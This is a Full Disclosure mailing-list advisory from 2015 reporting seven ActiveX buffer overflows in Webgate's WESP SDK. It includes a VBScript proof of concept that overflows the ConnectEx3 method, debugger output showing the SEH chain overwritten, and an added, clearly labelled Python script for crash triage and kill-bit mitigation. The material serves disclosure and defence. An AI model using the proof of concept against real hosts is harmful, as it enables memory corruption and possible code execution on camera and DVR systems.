Message-ID: <CABjjeyn=w2rB4TxMddj1kBWV9k93wnw1YbdaHJk5rB4HsNWe-g@mail.gmail.com>
Date: Mon, 23 Feb 2015 23:14:08 +0530
From: Praveen D <praveend.hac@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] WESP SDK multiple Remote Code Execution Vulnerabilities

Webgate technology is focused on digital image processing, embedded system
design and networking to produce embedded O/S and web server cameras
providing real time images. We are also making superior network stand-alone
DVRs by applying our accumulated network and video solution knowledge.

The WEBGATE Embedded Standard Protocol (WESP) SDK provides the same set of
ActiveX controls for both network DVRs and network cameras.

Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax
Technology, Fujitsu AOS Technology, inc

http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html

Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow
Vulnerability 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow


CompanyName WebgateInc
FileDescription WESPConfig Module
FileVersion 1, 6, 42, 0
InternalName WESPConfig
LegalCopyright Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName WESPConfig Module
ProductVersion 1, 6, 42, 0

******************PoC for one of the above Vulnerabilities***********
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype  = "Sub ConnectEx3 ( ByVal bDvrs As Integer ,  ByVal Address As
String ,  ByVal Port As Integer ,  ByVal UserID As String ,  ByVal Password
As String ,  ByVal extcompany As Long ,  ByVal authType As Long ,  ByVal
AdditionalCode As String )"
memberName = "ConnectEx3"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount   = 8
-->
<script language='vbscript'>

arg1=1
arg2=String(1044, "A")
arg3=1
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=1
arg8="defaultV"

target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8

</script>
</html>
******************************
Stack trace for above PoC
Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141


Called From                   Returns To
--------------------------------------------------
msvcrt.76ACD33D               WESPPlayback.999539
WESPPlayback.999539           41414141
41414141                      22E5E0
22E5E0                        2F712C
2F712C                        41414141
41414141                      41414141
41414141                      41414141
41414141                      41414141


Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020


Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX]  <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP


ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00  [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00  [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00  [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
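The debugger output above is raw. As an added example that is not part of the original post, the following Python script shows how a defender can triage such a log automatically and produce the standard mitigation for an unpatched ActiveX control: it parses the exception code, SEH chain and registers, flags any value that consists entirely of the PoC's fill byte (0x41, "A"), which is how the overwritten SEH handler and the corrupted string pointer in EAX stand out, and emits the Internet Explorer ActiveX kill-bit registry entry (Compatibility Flags = 0x400) for the CLSID used in the PoC so the control can no longer be instantiated from a web page. The embedded log lines are copied from the post; the function and class names are this example's own.

```python
import re
from dataclasses import dataclass, field

# Crash log excerpt copied from the advisory above (embedded here as sample input).
CRASH_LOG = """Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141

Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020
"""

# CLSID taken from the PoC's <object classid=...> tag.
POC_CLSID = "4E14C449-A61A-4BF7-8082-65A91298A6D8"

FILL_BYTE = 0x41  # the PoC fills the oversized argument with "A" (0x41)


@dataclass
class Triage:
    exception: str = ""
    seh_handlers: list = field(default_factory=list)
    registers: dict = field(default_factory=dict)


def is_fill_pattern(value: int, fill: int = FILL_BYTE) -> bool:
    """True when all four bytes of a 32-bit value equal the fill byte."""
    return value == int.from_bytes(bytes([fill]) * 4, "little")


def parse_crash_log(text: str) -> Triage:
    """Parse the 'Exception Code', 'Seh Chain' and 'Registers' sections of the log."""
    t = Triage()
    section = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("-"):
            continue
        if line.startswith("Exception Code:"):
            t.exception = line.split(":", 1)[1].strip()
        elif line.endswith(":"):
            section = line[:-1]          # "Seh Chain" / "Registers" / ...
        elif section == "Seh Chain":
            _, handler = line.split()    # "<index> <handler address>"
            t.seh_handlers.append(int(handler, 16))
        elif section == "Registers":
            m = re.match(r"([A-Z]{3})\s+([0-9A-Fa-f]{8})", line)
            if m:
                t.registers[m.group(1)] = int(m.group(2), 16)
    return t


def controlled_registers(t: Triage) -> list:
    """Registers whose value is entirely the fill byte, i.e. came from the PoC input."""
    return sorted(name for name, val in t.registers.items() if is_fill_pattern(val))


def classify(t: Triage) -> str:
    """Coarse exploitability classification in the spirit of !exploitable-style triage."""
    seh_hit = any(is_fill_pattern(h) for h in t.seh_handlers)
    if seh_hit and t.exception == "ACCESS_VIOLATION":
        return "SEH handler overwritten with attacker-controlled data"
    if controlled_registers(t):
        return "attacker-controlled register values at crash"
    return "no obvious control"


def killbit_reg(clsid: str) -> str:
    """Return .reg text that sets the IE ActiveX kill bit (Compatibility Flags 0x400)."""
    if not re.fullmatch(r"[0-9A-Fa-f]{8}-([0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}", clsid):
        raise ValueError("not a CLSID: " + clsid)
    key = ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\"
           "ActiveX Compatibility\\{" + clsid.upper() + "}")
    return ("Windows Registry Editor Version 5.00\n\n"
            "[" + key + "]\n"
            '"Compatibility Flags"=dword:00000400\n')


if __name__ == "__main__":
    triage = parse_crash_log(CRASH_LOG)
    print("exception:", triage.exception)
    print("controlled registers:", controlled_registers(triage))
    print("verdict:", classify(triage))
    print(killbit_reg(POC_CLSID))
```

The generated .reg file is the kill bit Microsoft documents for blocking a specific control in Internet Explorer; it only stops instantiation from the browser, so hosts that still need the WESP SDK for the vendor's own applications keep the DLLs but lose the web-page attack surface.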

P.S. CERT tried to coordinate with the vendor on fixing these issues, but
there was no response from the vendor.

Best Regards,
Praveen Darshanam

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/